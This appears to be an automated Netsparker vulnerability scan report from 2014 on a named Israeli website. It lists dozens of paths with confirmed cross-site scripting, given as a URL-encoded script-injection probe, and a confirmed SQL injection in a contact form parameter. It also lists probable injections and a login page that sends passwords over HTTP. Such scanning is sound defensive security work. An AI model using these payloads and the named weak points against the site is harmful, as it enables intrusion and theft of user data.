NETSPARKER SCAN REPORT SUMMARYTARGET URL http://www.shalomlaam.co.il/

SCAN DATE 20 15:41:03 2014

REPORT DATE 20 16:55:44 2014

SCAN DURATION 01:12:58

TotalRequests

59131

AverageSpeed

13.51req/sec.

268identified

158confirmed

10critical

95informational

SCAN SETTINGSENABLEDENGINES

Static Tests, Find Backup Files, SQL Injection,Boolean SQL Injection, Blind SQL Injection, Cross-siteScripting, Command Injection, Blind Command Injection,Local File Inclusion, Remote File Inclusion, RemoteCode Evaluation, HTTP Header Injection, OpenRedirection, Expression Language Injection

Authentication

Scheduled

VULNERABILITIESCRITICAL4%

IMPORTANT

57%MEDIUM3%

LOW1%

INFORMATION

35%

1 / 146

VULNERABILITY SUMMARYURL Parameter Method Vulnerability Confirmed

/ [Possible]InternalPathLeakage(*nix)

No

/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DB)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/2minute/ [Possible]InternalPathLeakage(*nix)

No

/about'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004F1)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/about/ [Possible]InternalPathLeakage(*nix)

No

/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013C)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/about/Default.asp [Possible]InternalPathLeakage(*nix)

No

/about/reg/ QueryBased

QueryString

Cross-siteScripting Yes

/about/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004FA)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/about/reg/maillingUpdate.asp QueryBased

QueryString

Cross-siteScripting Yes

/about/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000522)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/about/search/ QueryBased

QueryString

Cross-siteScripting Yes

/about/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00052F)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/about/search/default.asp QueryBased

QueryString

Cross-siteScripting Yes

/about/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055A)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/allvideo/ [Possible]InternalPathLeakage(*nix)

No

/allvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/alon/ [Possible]InternalPathLeakage(*nix)

No

/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000150)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/alon/archive.asp [Possible]InternalPathLeakage(*nix)

No

/alon/Default.asp [Possible]InternalPathLeakage(*nix)

No

/alon/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00043A)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/alon/list.asp [Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000156)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/alon/mador.asp [Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/alon/musag.asp [Possible]InternalPathLeakage(*nix)

No

/alon/musag.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000198)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

2 / 146

/ask'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00017C)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/ask/ rabbi GET Cross-siteScripting Yes

cat GET Cross-siteScripting Yes

search POST Cross-siteScripting Yes

[Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000149)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/ask/answer.asp ProgrammingErrorMessage

No

[Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000195)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/ask/ask_rabbi.asp [Possible]InternalPathLeakage(*nix)

No

/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000584)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/ask/Default.asp [Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/ask/reg/ QueryBased

QueryString

Cross-siteScripting Yes

/ask/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00062A)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/ask/reg/maillingUpdate.asp QueryBased

QueryString

Cross-siteScripting Yes

/ask/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000642)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/ask/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000646)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/banner/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057B)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/bmidrash/ [Possible]InternalPathLeakage(*nix)

No

/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C7)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/bmidrash/answer.asp [Possible]InternalPathLeakage(*nix)

No

/bmidrash/bprint.asp [Possible]InternalPathLeakage(*nix)

No

/bmidrash/Default.asp [Possible]InternalPathLeakage(*nix)

No

/bmidrash/list.asp [Possible]InternalPathLeakage(*nix)

No

/bmidrash/mekorot.asp [Possible]InternalPathLeakage(*nix)

No

/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00015B)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/Branches/snif.asp [Possible]InternalPathLeakage(*nix)

No

/Branches/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000204)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

3 / 146

/contact/ name_id POST SQLInjection Yes

sendFrom POST [Probable]SQLInjection

No

name POST [Probable]SQLInjection

No

phone POST [Probable]SQLInjection

No

subject POST [Probable]SQLInjection

No

f_name POST [Probable]SQLInjection

No

name_id POST [Probable]SQLInjection

No

MSSQLVersionIsOutOfDate

No

MicrosoftSQLServerIdentified

Yes

E-mailAddressDisclosure

No

[Possible]InternalPathLeakage(*nix)

No

/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000138)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/contact/Default.asp [Possible]InternalPathLeakage(*nix)

No

/contact/reg/ QueryBased

QueryString

Cross-siteScripting Yes

/contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/contact/reg/maillingUpdate.asp QueryBased

QueryString

Cross-siteScripting Yes

/contact/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000498)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/contact/search/ QueryBased

QueryString

Cross-siteScripting Yes

/contact/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004A9)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/contact/search/default.asp QueryBased

QueryString

Cross-siteScripting Yes

/contact/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004D2)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/crossdomain.xml OpenPolicyCrossdomain.xmlIdentified

Yes

/Default.asp [Possible]InternalPathLeakage(*nix)

No

/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000216)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B2)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/gallery/ [Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00014F)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/gallery/branches.asp [Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

4 / 146

/gallery/Default.asp [Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/gallery/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00026D)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/gallery/snifim.asp [Possible]InternalPathLeakage(*nix)

No

/gallery/upload_img.asp FileUploadFunctionalityIdentified

Yes

[Possible]InternalPathLeakage(*nix)

No

/gvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000115)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000134)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/gvideo/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000439)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/gvideo/js/swfaddress.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000445)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/gvideo/js/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00043D)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/gvideo/style/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00044E)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/gvideo/style/style.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000452)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/gvideo/testimonialrotator/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000446)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/gvideo/testimonialrotator/testimonialrotator.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000455)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/gvideo/testimonialrotator/testimonialrotator.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000449)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/hagim/ [Possible]InternalPathLeakage(*nix)

No

/hagim/3shavuot.asp [Possible]InternalPathLeakage(*nix)

No

/home/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/home/1.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000119)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011E)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/images/ InternalServerError Yes

/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000105)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/images/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E9)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/images/pagetop.asp QueryBased

QueryString

Cross-siteScripting Yes

/images/pagetop.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E6)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/jAccordion/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F2)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000127)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/jAccordion/jquery.easing.1.3.min.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F5)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/jAccordion/jquery.jAccordion-1.2.1.min.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F9)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/js/ ForbiddenResource Yes

/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

5 / 146

/js/+%20win%20+ QueryBased

QueryString

Cross-siteScripting Yes

/js/+%20win%20+'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000409)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/js/AC_RunActiveContent.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DF)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/js/delate_image.asp QueryBased

QueryString

Cross-siteScripting Yes

/js/delate_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003CE)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/js/func_site.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DC)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/js/getbanner.asp QueryBased

QueryString

Cross-siteScripting Yes

/js/getbanner.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E5)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/js/HebDate.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E5)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/js/images/ QueryBased

QueryString

Cross-siteScripting Yes

/js/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00040C)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/js/top1.htm QueryBased

QueryString

Cross-siteScripting Yes

/js/top1.htm'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003C2)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/js/upload_image.asp QueryBased

QueryString

Cross-siteScripting Yes

/js/upload_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003AF)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/kaftorim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057E)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/komiks/ [Possible]InternalPathLeakage(*nix)

No

/komiks/Default.asp [Possible]InternalPathLeakage(*nix)

No

/l/ [Possible]InternalPathLeakage(*nix)

No

/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A7)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/l/agrala_miadim.asp [Possible]InternalPathLeakage(*nix)

No

/l/agrala_sheelot.asp [Possible]InternalPathLeakage(*nix)

No

/l/agrala_takanon.asp [Possible]InternalPathLeakage(*nix)

No

/l/agrala_tozaot.asp [Possible]InternalPathLeakage(*nix)

No

/l/Default.asp [Possible]InternalPathLeakage(*nix)

No

/lessons/ yom POST [Probable]SQLInjection

No

[Possible]InternalPathLeakage(*nix)

No

/lessons/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A8)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/lessons/default.asp yom POST [Probable]SQLInjection

No

[Possible]InternalPathLeakage(*nix)

No

/LIVE/ [Possible]InternalPathLeakage(*nix)

No

/LIVE/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019D)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

6 / 146

/live/form_live.asp [Possible]InternalPathLeakage(*nix)

No

/maillingUpdate.asp QueryBased

QueryString

Cross-siteScripting Yes

/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000210)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/news'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B7)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/news/ [Possible]InternalPathLeakage(*nix)

No

/news/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000400)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/news/Default.asp [Possible]InternalPathLeakage(*nix)

No

/page/ [Possible]InternalPathLeakage(*nix)

No

/page/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E9)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/page/odot/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004E2)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/pages/ [Possible]InternalPathLeakage(*nix)

No

/pages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001F1)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/pages/Default.asp [Possible]InternalPathLeakage(*nix)

No

/pages/page.asp [Possible]InternalPathLeakage(*nix)

No

/pages/page.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00021B)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/pagetop.asp [Possible]InternalPathLeakage(*nix)

No

/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011F)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/pitgam'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013F)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/pitgam/ [Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045B)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/pitgam/Default.asp [Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/Presentation/ [Possible]InternalPathLeakage(*nix)

No

/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000145)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/Presentation/Default.asp [Possible]InternalPathLeakage(*nix)

No

/reg/ email POST [Probable]SQLInjection

No

[Possible]InternalPathLeakage(*nix)

No

/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B9)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/reg/Default.asp [Possible]InternalPathLeakage(*nix)

No

7 / 146

/reg/login.asp PasswordTransmittedOverHTTP

Yes

AutoCompleteEnabled

Yes

[Possible]InternalPathLeakage(*nix)

No

/reg/maillingUpdate.asp DatabaseErrorMessage

No

[Possible]InternalPathLeakage(*nix)

No

/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D5)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/reg/reg.asp [Possible]InternalPathLeakage(*nix)

No

/scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FD)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/scripts/swfobject.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FF)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/search/ [Possible]InternalPathLeakage(*nix)

No

/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D7)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/search/default.asp q GET Cross-siteScripting Yes

[Possible]InternalPathLeakage(*nix)

No

/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DA)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/sh/ [Possible]InternalPathLeakage(*nix)

No

/sh/default.asp [Possible]InternalPathLeakage(*nix)

No

/sipur/ [Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/sipur/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A0)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/sipur/Default.asp [Possible]InternalPathLeakage(*nix)

No

/sipur/page.asp [Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/sipur/send_sipur.asp [Possible]InternalPathLeakage(*nix)

No

/site/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000106)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/about/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028E)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/alon/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00012E)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/alon/archive.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00029F)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/alon/list.asp CatID GET HTTPHeaderInjection

No

/site/alon/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000131)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/ask/ CatID GET HTTPHeaderInjection

No

/site/ask/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000298)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

8 / 146

/site/ask/answer.asp id GET HTTPHeaderInjection

No

/site/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000302)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/ask/answer_print.asp [Possible]InternalPathLeakage(Windows)

No

/site/ask/ask_rabbi.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002D2)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/bmidrash/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AD)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/bmidrash/answer.asp id GET HTTPHeaderInjection

No

/site/bmidrash/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00037E)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/bmidrash/list.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00033E)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/bmidrash/mekorot.asp id GET HTTPHeaderInjection

No

/site/bmidrash/mekorot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000386)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A1)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028A)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/etz_haim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AE)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/gallery/ IISVersionDisclosure

No

/site/gallery/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000F7)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E8)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/gallery/highslide/highslide.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000123)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/gallery/highslide/highslide-full.js'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C4)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A2)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/l/agrala_miadim.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00038E)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/l/agrala_sheelot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000397)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/l/agrala_takanon.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000393)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/l/agrala_tozaot.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A5)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00045E)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/pitgam/ CatID GET HTTPHeaderInjection

No

/site/pitgam/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000293)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002DC)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00027E)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/reg/login.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000283)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/reg/reg.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000288)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/site/uploadimages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B4)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

9 / 146

/site/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B1)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/sitemap.xml SitemapIdentified No

/snif.asp QueryBased

QueryString

Cross-siteScripting Yes

/snif.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000234)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/tags/ q GET Cross-siteScripting Yes

[Possible]InternalPathLeakage(*nix)

No

/tags/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BB)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/tags/tags.asp [Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CB)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/UploadImages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000109)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/uploadimages/2011_8_22_13_2_45.JPG'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000573)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/video/ [Possible]InternalPathLeakage(*nix)

No

/video/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CE)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/video/Default.asp [Possible]InternalPathLeakage(*nix)

No

/vod/ [Possible]InternalPathLeakage(*nix)

No

/vod/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00016B)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/vod/vod.asp id GET Cross-siteScripting Yes

[Possible]InternalPathLeakage(*nix)

No

[Possible]InternalPathLeakage(Windows)

No

/vod/vod.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000160)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001AF)%3C/script%3E

URI-BASED FullURL Cross-siteScripting Yes

10 / 146

1 TOTALCRITICALCONFIRMED

1

1. SQL InjectionSQLInjectionoccurswhendatainputforexamplebyauserisinterpretedasaSQLcommandratherthannormaldatabythebackenddatabase.Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications.NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLQueryontheback-enddatabase.

{PRODUCT}identifiedanSQLinjection,whichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase.

